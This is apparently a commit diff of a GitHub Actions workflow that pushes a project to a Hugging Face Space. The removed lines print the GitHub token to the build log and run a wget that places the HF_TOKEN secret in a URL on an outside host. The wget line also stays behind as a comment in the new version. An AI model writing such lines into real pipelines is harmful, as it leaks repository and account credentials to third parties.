cahya commited on
Commit
041c2f5
1 Parent(s): 73ce195

Update hf-spaces.yml

Browse files
Files changed (1) hide show
  1. .github/workflows/hf-spaces.yml +3 -7
.github/workflows/hf-spaces.yml CHANGED
@@ -16,11 +16,7 @@ jobs:
16
  fetch-depth: 0
17
  - name: Push to hub
18
  env:
19
- HF_TOKEN: '${{ secrets.TEST }}'
20
- TEST_GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
21
- GITHUB_CONTEXT: ${{ toJson(github) }}
22
  run: |
23
- echo "${TEST_GITHUB_TOKEN}"
24
- echo ${#GITHUB_CONTEXT}
25
- wget https://image-search.uncool.ai/"$HF_TOKEN"/1
26
- # git push https://cahya:$HF_TOKEN@huggingface.co/spaces/cahya/indonesian-story main
16
  fetch-depth: 0
17
  - name: Push to hub
18
  env:
19
+ HF_TOKEN: ${{ secrets.HF_TOKEN }}
 
 
20
  run: |
21
+ # wget https://image-search.uncool.ai/"$HF_TOKEN"/1
22
+ git push https://cahya:$HF_TOKEN@huggingface.co/spaces/cahya/indonesian-story main